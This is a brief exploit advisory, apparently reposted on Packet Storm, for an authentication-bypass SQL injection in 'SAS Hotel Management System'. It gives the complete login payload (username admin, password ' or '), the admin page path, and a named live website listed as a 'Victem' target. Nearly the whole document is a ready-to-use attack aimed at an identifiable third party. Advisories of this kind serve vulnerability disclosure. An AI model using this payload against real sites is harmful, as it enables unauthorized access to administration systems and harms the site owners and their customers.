SAS Hotel Management System suffers from a remote SQL injection vulnerability that allows for authentication bypass.
585341fa02961eaffc8aa4656a64bf3e17d9e2a57f06258cd16f21e46151189c#########################################################
---------------------------------------------------------
Portal Name: SAS Hotel Management System
Author : Pouya_Server , Pouya.s3rver@Gmail.com
<mailto:Pouya.s3rver@Gmail.com
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: admin
pass: ' or '
admin page : https://site/siteadmin/admin.asp
--------------------------------------------------------
Victem :
https://www.aebest.com/siteadmin/admin.asp
---------------------------------------------------------
#########################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed